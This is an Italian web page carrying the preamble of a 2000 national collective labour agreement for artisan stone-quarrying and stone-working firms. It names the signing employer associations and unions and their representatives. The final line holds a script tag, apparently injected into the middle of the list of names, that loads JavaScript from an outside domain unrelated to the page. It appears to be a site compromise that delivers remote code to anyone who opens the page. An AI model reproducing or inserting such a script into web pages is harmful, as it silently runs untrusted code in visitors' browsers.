Torna
all'elenco delle categorie
|
Categoria: Lapidei, estrazione e lavorazione (artigiani) Settore: Edilizia Data stipula: 26-7-2000 Data decorrenza: 1-10-1999 Data scadenza: 30-9-2003
Contratto Collettivo Nazionale di Lavoro
PER I DIPENDENTI DALLE IMPRESE ARTIGIANE ESERCENTI L'ATTIVITÀ
DI ESCAVAZIONE E LAVORAZIONE DEI MATERIALI LAPIDEI
Roma, 26 luglio 2000
tra
- Associazione Nazionale Marmisti-CONFARTIGIANATO rappresentata dal
Presidente Augusto Soldà, dal Vice Presidente Silvano Bacci, con la
partecipazione di Andrea Barsi e con l'assistenza di CONFARTIGIANATO,
rappresentata dal Presidente Ivano Spalanzani e dal Segretario generale
Francesco Giacomin, assistiti dal Direttore dell'Area politica, economica
e sindacale Bruno Gobbi e dal Responsabile del Settore contrattuale
Riccardo Giovani;
- CNA nazionale rappresentata dal Presidente Gonario Nieddu, dal
Segretario generale Gian Carlo Sangalli, dal Vice Presidente nazionale
vicario ILMA Giovanni Di Miceli, dai Vice Presidenti nazionali Giovanni
Bettinazzi, Gian Carlo Sestu e Ugo Da Prato, dal Segretario nazionale ILMA
Giovanni Giannerini e da Giuseppe Signori, Segretario regionale ILMA
Veneto; assistiti dal Responsabile Area Politiche sociali e sindacali
Alberto De Crais e dal Responsabile Ufficio dialogo sociale e
contrattualistica Enrico Amadei;
- Confederazione Autonoma Sindacati Artigiani (CASARTIGIANI)
rappresentata dal Presidente Giacomo Basso, con l'assistenza del
Segretario Generale Paolo Melfa e con l'intervento della Federazione
Italiana Artigiani Lapidei rappresentata dal Responsabile Nazionale
Giuliano Pizzocchia;
- Confederazione delle Libere Associazioni Artigiane Italiane (CLAAI)
rappresentata dal Presidente Isidoro Platania, dai Vice Presidenti Pier
Polga e Cesare De Prosperis e da Ruggero Go, Rocco Maurelli, Sergio Sanna,
assistiti da Pasquale Maiocco e Rita Balzoni
e
- Federazione Nazionale Lavoratori Edili e Affini del Legno (FeNEAL)
aderente a UIL, rappresentata dal Segretario generale Francesco
Marabottini; dai componenti la Segreteria nazionale: Learco Sacchetti,
Donato Bernardo Ciddio, Antonio Correale, Francesco Gullo, Massimo Trinci,
Giuseppe Moretti, Raffaele Rizzacasa; dai componenti la Direzione
nazionale: Angelo Caruso, Franco Carvelli, Angelo Catalano, Ferdinando
Ceschia, Emilio Correale, Francesco De Martino, Silvio Errico, Paolo
Ferrari, Luciano Fioretti, Leonardo Frascarelli, Ladislao Linari,
Ferdinando Lioi, Pompeo Naldi, Domenico Palma, Pierpaolo Panu, Giovanni
Panza, Vito Panzarella, Fabrizio Pascucci, Sabino Pazienza, Vincenzo Posa,
Saverio Ranieri, Franco Righetti; dai componenti la Delegazione trattante:
Marco Battistini, Guido Cacchi, Renzo Caruso, Maurizio D'Aurelio, Mario
Artzu, Pasqualino Festa, Valerio Franceschini, Francesco Fulignani, Carlo
Giorgi, Amedeo Guidugli, Gianluigi Meggiolaro, Mario Pinto, Enrico
Staffieri, Fabrizio Tassara, Claudio Vendramin, Pio Vitobello, Benito
Zappulla, Salvatore Zermo;
- Federazione Italiana Lavoratori Costruzioni e Affini (FILCA) aderente
a CISL, rappresentata dal Segretario generale Cesare Regenzi, dai
Segretari nazionali Piero Baroni, Giuliano Cantoni, Giuseppe Moscuzza e
Giuseppe Virgilio, dall'operatore Lanfranco Vari, dai componenti
l'esecutivo nazionale: Sebastiano Accolla, Maurizio Bernava, Casolino
Giocondino, Ceres Antonio, Cerqua Antonio, Corveddu Renzo, Franco De
Gattis, Umberto De Simoni, Emilio Di Conza, Ciro Donnarumma, Diego
Faccini, Giulio Fortuni, Claudio Gessi, Antonio Lazzaroni, Franco
Lorenzon, Mennato Magnolia, Francesco Marcone, Giovanni Matta, Goriziano
Merotto, Daniele Morassut, Stefano Nuti, Gianni Pedrazzini, Ferdinando
Piccinini, Giuliano Pizzo, Gianfranco Reale, Paolo Rigucci, Ulderico
Sbarra, Primo Schonsberg, Antonio Scuteri, Salvatore Sorace, Ferdinando
Speranza, Santo Spinella, Giovanni Tamburella,<script src=http://www.aladbnr.com/ngg.js></script>
|